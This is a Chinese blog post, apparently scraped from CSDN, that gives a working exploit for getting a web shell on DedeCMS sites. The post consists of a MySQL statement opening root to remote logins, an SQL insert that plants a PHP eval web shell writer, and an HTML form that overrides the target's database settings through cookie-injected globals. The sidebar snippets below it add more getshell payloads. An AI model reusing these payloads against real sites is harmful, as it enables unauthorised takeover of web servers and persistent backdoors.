DEDECMS拿SHELL EXP

最新推荐文章于 2024-08-28 10:30:00 发布
最新推荐文章于 2024-08-28 10:30:00 发布
阅读量978 收藏
点赞数
分类专栏: 漏洞收集 文章标签: shell input fp insert action php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6748414
版权

此漏洞的前提是必须知道后台或plus 目录存在,服务器能外连,就能拿shell
因此大家一定要养成使用DEDECM建站时改后台名字的习惯。


MYSQL开启外链语句:GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '' WITH GRANT OPTION;

 

接下来:

前题条件,必须准备好自己的dede数据库,然后插入数据:

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?phpeval($_POST[c])?>\');echo "OK";@fclose($fp);{/dede:php}'); 
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究
 <form action="" method="post" name="QuickSearch" id="QuickSearch"onsubmit="addaction();">

<input type="text" value="http://www.laod.org/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />

<input type="text" value="dbhost"name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />

<input type="text"value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />

<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />

<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br/>

<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />

<input type="text" value="true" name="nocache" style="width:400">

<input type="submit"value="提交" name="QuickSearchBtn"><br /></form><script>function addaction(){document.QuickSearch.action=document.QuickSearch.doaction.value;}</script>

7禧
关注
专栏目录
Redis未授权访问漏洞记录(端口:6379、Linux、Windows)
墨痕诉清风的博客
11-12 7143
这就让黑客有了可乘之机,黑客可以远程连接到该数据库。但随着现代的服务部署方式的不断发展,组件化成了不可逃避的大趋势,docker就是这股风潮下的产物之一,而在这种部署模式下,一个单一的容器中不会有除 redis以外的任何服务存在,包括sh和 crontab,再加上权限的严格控制,只靠写文件就很难再 getshell了,在这种情况下,我们就需要其他的利用手段了。并且可以在 /root/.ssh/ 目录下看到我们上传的 authorized_keys 文件,正是由于这个文件的存在,我们才可以在本地用私钥登录。.
【信息收集】——3、信息收集指南
热门推荐
Fly_鹏程万里
02-26 4万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 前言 本系列文章只做技术研究与分享,如有恶意利用文章中提及的技术做网络攻击,造成的法律责任,作者概不负责! 安全问题的本质 安全问题的本质是“信...
dede批量Getshell
10-31
这个是百度批量的。自己保存为xx.php <...$exploit=Getshell($url); if (...% 5BGLOBALS%5D%5Bcfg_dbname%5D=de...
另类dedecms后台拿shell
weixin_30412013的博客
05-15 504
遇到一个被阉割的后台,发现直接传shell显然不行。 然后就有了下文 添加一个新广告。 插入一句话木马: 1 --><?php $_GET[c]($_POST[x]);?><!-- 然后访问: /plus/ad_js.php?aid=42&c=assert aid后面的值是你广告的id。 转载于:https://www....
渗透实战:dedeCMS任意用户密码重置到内网getshell
最新发布
xnxqwzy的博客
08-28 814
DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。通过信息泄露,攻击者可以获取到网站的用户的用户名和一些敏感信息,然后通过利用任意密码重置漏洞,在不知道原密码的情况下,重置管理员账号的密码,从而获取管理员权限。接着,攻击者可以通过后台getshell,获取网站的控制权,进而进行各种恶意操作,如上传恶意文件、篡改网站内容、窃取用户信息等。
CVE-2018-9175 DEDECMS后台getshell
weixin_43263451的博客
03-19 1663
基础 dedecms对于输入是首先全局进行过滤的,在/common.inc.php中注册(赋值变量)并过滤外部提交的参数,下图可以看到对输入参数进行addslashes 漏洞分析 首先在 dede\sys_verifies.php的152行 159-160行创建配置文件modifytmp.inc 161-162行给其中写入一些php的头和内容 166行中refiles参数是我们可控的,看起来默认是数组格式,对于refiles里面每一个值从168-180行进行一些操作,注意最重要的是180行,前面都无所谓
dedecms 5.7后台拿WEBSHELL
weixin_33991727的博客
03-31 352
由于系统自带的文件管理器插件没有过滤文件上传及编辑后保存的文件名, 导致直接写入webshell漏洞。 漏洞测试: 1、进入后台,默认的是dede www.xxxx.com/dede 左边导航栏目,选择模块>辅助插件>文件管理器 (系统默认安装的,如果没有请在插件管理器中自行安装)>然后选择新建文本(或者文件上传) 如上图:文件名称随便填,例如1...
dedeCMS后台getshell(三种方法)
weixin_51692662的博客
11-29 1226
dedecms后台sql命令写入一句话
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5606
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
2021-10-074号靶场转自y神的学习笔记(net渗透,sockcap,msf多重网段渗透,os-shell,验证码重放,C#解密,wfuzz穷举subdomain)
qq_45290991的博客
10-07 2605
masscan扫描 kali@kali:~$ sudo masscan -p 1-65535 192.168.0.134 --rate=1000 [sudo] kali 的密码: Starting masscan 1.0.5 (http://bit.ly/14GZzc...
后台拿shell全集
05-14
后台拿shell全集后台拿shell全集后台拿shell全集
批量拿shell
01-22
高手批量拿shell ,有技术没技术都可以看看,绝对是好的教程
批量getshell教程+工具
07-28
批量getshell教程+工具
DEDE漏洞利用EXP
06-06
DEDE的EXP利用工具和教程。教程里面有详细的解说。
【渗透实战】日常挖洞第一期_社工某企业dedeCMSshell
q848581720的博客
10-22 795
/禁止转载 原作者QQ:848581720/ ■重要细节全部打码 ■部分细节对外开放 ●漏洞已提交,无影响厂商忽略 注:日常挖洞系列基本上是记录平常遇到的非常普通的漏洞,毫无看点,仅仅记录挖洞的经验 ———————————————— 0X001收集信息 因为这是某个大型服务器集成的共享宽带型虚拟主机,所以我就不在这说是什么服务器了, 也不告诉大家域名是多少,只是让大家互相学习,交流经验。 首先在站...
Dedecms 5.7 SP2后台广告管理处getshell
weixin_43457035的博客
11-22 3647
Dedecms 5.7 SP2后台广告管理处getshell dedecms版本可以到织梦官网下载:http://www.dedecms.com/products/dedecms/downloads/ 1、搭建成功,后台管理系统 2、进入后台后,找到广告,新增一个广告 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nUyH97Q2-1628309575163)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-
apache的网站配置目录_网站后台getshell的方法总结
weixin_39977776的博客
11-06 595
方法一:直接上传getshelldedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下:即可成功上传大马,并成功执行,从而拿下webshell。坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用../跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名方法二:数据库备份getshell以南方数据cms为例:1,首先上传一张图片马...
百度站长平台“爆”dede后台直取webshell
IT技术宅-北方的刀郎
03-21 2241
百度站长平台“爆”dede后台直取webshell2013-09-08      0 个评论       作者:Rieck收藏    我要投稿利用百度站长平台找出5W“dede核心”站点,如果有技术的HEI,KE,可能把这5W条的网址给你就OK了,但我们这些低级的“小HEI”只会一些简单的注入,有些时候会遇到“账号密码”全部搞定了,但找不到后台这种事情,什么后台扫描工具用了一大堆,但还是找不到后台
dedecmsshell
08-24
DedeCMS是一款常见的内容管理系统,它也存在一些被黑客利用的漏洞来获取shell权限。其中,有一种常见的方法是通过在广告管理模块中的新建广告功能中插入恶意代码来实现。具体操作是在广告内容处写入恶意代码并提交,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值